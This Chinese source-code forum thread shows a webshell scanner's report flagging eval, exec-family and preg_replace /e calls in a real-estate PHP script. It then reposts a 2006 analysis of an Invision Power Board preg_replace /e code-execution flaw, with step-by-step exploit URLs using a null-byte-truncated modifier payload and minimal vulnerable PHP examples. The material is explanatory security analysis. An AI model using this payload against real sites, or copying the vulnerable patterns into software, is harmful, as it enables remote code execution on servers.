E:\Download\安乐业1.2\fangke\uc_client\model\base.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:06:07
2010-3-16 4:30:26
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\bdata\fangke_peking\cdb_addons_1.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:08
2010-3-18 12:23:40
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\bdata\fangke_peking\cdb_caches_1.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:08
2010-3-18 12:23:46
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\bdata\fangke_peking\cdb_crons_1.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:08
2010-3-18 12:23:46
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\bdata\fangke_peking\cdb_request_1.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:08
2010-3-18 12:24:04
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\bdata\fangke_peking\cdb_usergroups_1.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:08
2010-3-18 12:24:18
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\class\combakfun.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:09
2009-10-26 11:11:58
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\class\config.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:09
2010-3-17 8:48:24
E:\Download\安乐业1.2\fangke\帝国备份王带库(用时改个名字)\class\phpzip.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:06:09
2008-7-17 14:34:42


包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。

有高手没有,期待修复一下
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享

8

主题

843

帖子

210

金币

任意通会员(年费)

积分
1091
2#
 楼主| 发表于 2010-3-22 12:17:22 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
函数preg_replace+/e 漏洞利用

来源:http://www.xfocus.net/articles/200605/866.html
创建时间:2006-05-03
文章属性:原创
文章提交:HeiGe (hack-520_at_163.com)
ipb search.php 漏洞分析及思考
Author:SuperHei_[At]_ph4nt0m.org
Blog:http://superhei.blogbus.com/
Team:http://www.ph4nt0m.org
Data: 2006-04-27
#############
##简单分析###
#############
该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php  行1258-1262:
    if ( $this->ipsclass->input['lastdate'] )
        {
            $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1
selected='selected'", $this->output );
            
        }
    }
通过变量input['lastdate']注入/e, $this->output注入shellcode。
#############
##利用方法###
#############
注册一个用户,发个贴 内容[shellcode]如下:[
superheixxxxxxxeval(phpinf0()); //
注意最后的;和//之间有一空格
然后点“Search”--->Search by Keywords:superheixxxxxxxeval [记得选择Show results as posts ]
可以得到searchid
http://127.0.0.1/ipb215/upload/i ... _in=posts&resul
t_type=posts&highlite=superheixxxxxxxeval
然后在后面加一个&lastdate=z|eval.*?%20//)%23e%00 也就是[/e]提交就ok了:
http://127.0.0.1/ipb215/upload/i ... _in=posts&resul
t_type=posts&highlite=superheixxxxxxxeval&lastdate=z|eval.*?%20//)%23e%00
#############
##分析讨论###
#############
1.

简单分析:
该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php  行1258-1262:

    if ( $this->ipsclass->input['lastdate'] )
        {
            $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1

selected='selected'", $this->output );
            
        }
    }

通过变量input['lastdate']注入/e, $this->output注入shellcode。



这个分析,掉了一个重要的细节:preg_replace+/e 里有3个参数,只有第2个参数里的代码才可以执行,但是上面的语句貌似是第3个参数提交

的,其实不然,注意上面preg_replace里的第2个参数:\\1 selected='selected' 里面的\\1 为第一参数里正则表达试匹配后的值。归根结底

我们提交的shellcode还是在第2个参数执行了。

2.
注意最后的;和//之间有一空格

这个又是为什么呢?因为我们提交的lastdate=z|eval.*?%20//)%23e%00里是已空格+//为标志的,所以我们提交的shellcode也要有空格+//

3.preg_replace存在null截断漏洞????
我想这个应该算是php本身一个的漏洞[同以前include的null截断漏洞],我们测试下,把上面的漏洞写个简单的模型:
<?
$a=$_GET[a];
echo preg_replace("#(value=[\"']z|eval.*?//)#e{$a}[\"'])#i ","\\1 ","heigegegxxxxxxxeval(phpinfo());//");
?>
我们直接提交http://127.0.0.1/test2.php?a=2出现错误:
Warning: Unknown modifier '2' in d:\easyphp\www\test2.php on line 3
提交http://127.0.0.1/test2.php?a=%002 则执行phpinfo(). 我们成功截断了。模型代码执行环境要求gpc=off ,但是在很多的web程序里是
经过变量编码和解码在执行的,所以不受gpc的影响,上面的ipb的就可以在gpc=on的情况下截断。
4."lastdate=z|eval.*?%20//)%23e%00"的构造
主要是在this->output里以eval和%20//为标志取\\1 为执行的php代码。
5.worm的利用?
还记得Santy吗?就是利用的phpbb里的一个preg_replace,这里会会被利用呢?ipb这个漏洞的利用必须要登陆,但是在ipb注册时候有“图片
认证”,不过据说这个可以编写程序读出来?? 只要突破这个worm是有可能的,毕竟ipb的用户有那么多......
#############
##总结模型###
#############
1.直接在preg_replace第2个变量执行的模式:
<?
echo preg_replace("/test/e",$h,"jutst test");
?>
提交http://127.0.0.1/test/11/preg.php?h=phpinfo()
实例如:phpbb的viewtopic.php变量$highliht_match提交php代码执行漏洞
2.通过\\1[或者\\n]提取第3个变量里的php代码并执行的模式:
<?
echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", "\\1", $h);
?>
提交:http://127.0.0.1/test/11/preg.php?h=[php]phpinfo()[/php]
参考:
r57的exp:http://www.milw0rm.com/exploits/1720
更多资料:http://www.google.com

24

主题

355

帖子

717

金币

初级会员

Rank: 1

积分
1751
QQ
3#
发表于 2010-3-22 12:34:59 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
这么多,有没有好点的房产程序,想做个房产的

2

主题

421

帖子

500

金币

初级会员

Rank: 1

积分
1861
4#
发表于 2010-3-22 13:19:43 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
我晕!这么全面的检查,这么不堪一击的程序……

9

主题

350

帖子

701

金币

任意通会员(年费)

积分
1819
5#
发表于 2010-3-23 00:53:47 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
一个一个吗慢慢补吧!

0

主题

41

帖子

56

金币

初级会员

Rank: 1

积分
155
6#
发表于 2010-3-23 15:23:31 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
看着头就晕

15

主题

754

帖子

120

金币

初级会员

捡破烂的

Rank: 1

积分
943
7#
发表于 2010-3-24 17:29:34 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
我想知道你用啥测得。挺全面,类似PMD代码检查工具了

4

主题

741

帖子

271

金币

初级会员

Rank: 1

积分
1219
8#
发表于 2010-4-7 00:08:20 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
呵呵。。问题还真多的。。。慢慢补吧

7

主题

159

帖子

1405

金币

初级会员

冰蓝

Rank: 1

积分
3097
9#
发表于 2010-4-23 00:45:36 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
额,有人能搞到官方出的开源的,非房客的不?

0

主题

11

帖子

1

金币

初级会员

Rank: 1

积分
26
10#
发表于 2010-4-23 01:26:53 | 只看该作者
为了不扰乱会员对源码的测试,有问题咨询右侧客服不要直接回复,否则视为非法信息屏蔽会员ID!
照这样检测。还有安全的代码吗?
您需要登录后才可以回帖 登录 | 会员注册

本版积分规则

锦尚中国源码论坛

聚合标签|锦尚中国,为中国网站设计添动力 ( 鲁ICP备09033200号 ) |网站地图

GMT+8, 2024-11-15 13:10 , Processed in 0.143808 second(s), 26 queries .

带宽由 锦尚数据 提供 专业的数据中心

© 锦尚中国源码论坛 52jscn Inc. 非法入侵必将受到法律制裁 法律顾问:IT法律网 & 褚福省律师 锦尚爱心 版权申诉 版权与免责声明